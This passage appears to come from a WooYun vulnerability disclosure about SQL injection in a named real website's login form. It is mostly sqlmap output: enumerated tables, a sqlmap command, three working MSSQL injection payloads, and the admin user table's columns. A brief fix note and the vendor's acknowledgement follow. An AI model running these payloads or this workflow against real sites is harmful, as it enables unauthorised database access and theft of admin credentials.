[53 tables]
+----------------------+
| banner_img2 |
| cms_ad_class |
| cms_ad_file |
| cms_ad_mess |
| cms_admin_files |
| cms_admin_menu |
| cms_admin_role |
| cms_admin_user |
| cms_admin_userrole |
| cms_area_city |
| cms_area_news_column |
| cms_area_news_info |
| cms_area_province |
| cms_bq_info |
| cms_config |
| cms_files_images |
| cms_files_info |
| cms_files_kind |
| cms_friend_info |
| cms_gg_info |
| cms_hy_info |
| cms_hy_jf |
| cms_jytd_news_column |
| cms_jytd_news_info |
| cms_magazine_column |
| cms_magazine_info |
| cms_maps_info |
| cms_member_info |
| cms_member_kind |
| cms_member_level |
| cms_member_point |
| cms_menu_list |
| cms_message_center |
| cms_news_column |
| cms_news_comments |
| cms_news_info |
| cms_news_pic |
| cms_person_info |
| cms_position_info |
| cms_qixia_column |
| cms_qixia_info |
| cms_question_info |
| cms_related_news |
| cms_relates_our |
| cms_reply_info |
| cms_role_function |
| cms_shenqing_info |
| cms_smtp |
| cms_user_column |
| cms_ziliao |
| dtproperties |
| sysconstraints |
| syssegments |
+----------------------+
[10:46:43] [INFO] fetched data logged to text files under 'C:\Documents and Sett
ings\Administrator\.sqlmap\output\bj.crland.com.cn'


7.png


D:\Python27\sqlmap>sqlmap.py -r 1.txt -D "hrzd" -T "cms_admin_user" --columns
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150127}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 10:48:32
[10:48:32] [INFO] parsing HTTP request from '1.txt'
[10:48:32] [INFO] resuming back-end DBMS 'microsoft sql server'
[10:48:32] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: username (POST)
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
Payload: __VIEWSTATE=/wEPDwUKMTY1OTM1MDcyNWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N
0QmFja0tleV9fFgEFDEltYWdlQnV0dG9uMZAftmt4P06vFlHy4MjDSOOTRjeb&__EVENTVALIDATION=
/wEWBwLa/JS1AgKvpuq2CALyveCRDwL1+N3JBQKmi72KBgLDp/68BgLSwpnTCA0kl1Kkk40PQ/2E3qWf
oGPs/V9W&username=admin'; IF(7117=7117) SELECT 7117 ELSE DROP FUNCTION IxKh--&pa
ssword=1111&DropDownList1=chs&checker=t688D&ImageButton1.x=41&ImageButton1.y=14
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwUKMTY1OTM1MDcyNWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N
0QmFja0tleV9fFgEFDEltYWdlQnV0dG9uMZAftmt4P06vFlHy4MjDSOOTRjeb&__EVENTVALIDATION=
/wEWBwLa/JS1AgKvpuq2CALyveCRDwL1+N3JBQKmi72KBgLDp/68BgLSwpnTCA0kl1Kkk40PQ/2E3qWf
oGPs/V9W&username=admin' AND 5296=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(9
8)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (5296=5296) THEN CHAR(49) ELSE CHAR(48
) END))+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(120)+CHAR(113))) AND 'ktez'='ktez&pas
sword=1111&DropDownList1=chs&checker=t688D&ImageButton1.x=41&ImageButton1.y=14
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: __VIEWSTATE=/wEPDwUKMTY1OTM1MDcyNWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N
0QmFja0tleV9fFgEFDEltYWdlQnV0dG9uMZAftmt4P06vFlHy4MjDSOOTRjeb&__EVENTVALIDATION=
/wEWBwLa/JS1AgKvpuq2CALyveCRDwL1+N3JBQKmi72KBgLDp/68BgLSwpnTCA0kl1Kkk40PQ/2E3qWf
oGPs/V9W&username=admin' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(107
)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(66)+CHAR(103)+CHAR(109)+CHAR(101)+CHAR(69)+C
HAR(99)+CHAR(71)+CHAR(71)+CHAR(89)+CHAR(89)+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(1
20)+CHAR(113),NULL,NULL,NULL,NULL,NULL-- &password=1111&DropDownList1=chs&checke
r=t688D&ImageButton1.x=41&ImageButton1.y=14
---
[10:48:32] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[10:48:32] [INFO] fetching columns for table 'cms_admin_user' in database 'hrzd'
[10:48:32] [INFO] the SQL query used returns 10 entries
[10:48:32] [INFO] resumed: "ADD_TIME","datetime"
[10:48:32] [INFO] resumed: "column_uuid","varchar"
[10:48:32] [INFO] resumed: "END_TIME","datetime"
[10:48:32] [INFO] resumed: "is_child","bit"
[10:48:32] [INFO] resumed: "IS_USE","bit"
[10:48:32] [INFO] resumed: "PASSWORD","varchar"
[10:48:32] [INFO] resumed: "START_TIME","datetime"
[10:48:32] [INFO] resumed: "USER_TYPE","varchar"
[10:48:32] [INFO] resumed: "USERNAME","varchar"
[10:48:32] [INFO] resumed: "UUID","varchar"
Database: hrzd
Table: cms_admin_user
[10 columns]
+-------------+----------+
| Column | Type |
+-------------+----------+
| ADD_TIME | datetime |
| column_uuid | varchar |
| END_TIME | datetime |
| is_child | bit |
| IS_USE | bit |
| PASSWORD | varchar |
| START_TIME | datetime |
| USER_TYPE | varchar |
| USERNAME | varchar |
| UUID | varchar |
+-------------+----------+
[10:48:32] [INFO] fetched data logged to text files under 'C:\Documents and Sett
ings\Administrator\.sqlmap\output\bj.crland.com.cn'


8.png

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-05-09 15:14

厂商回复:

多谢提醒

最新状态:

暂无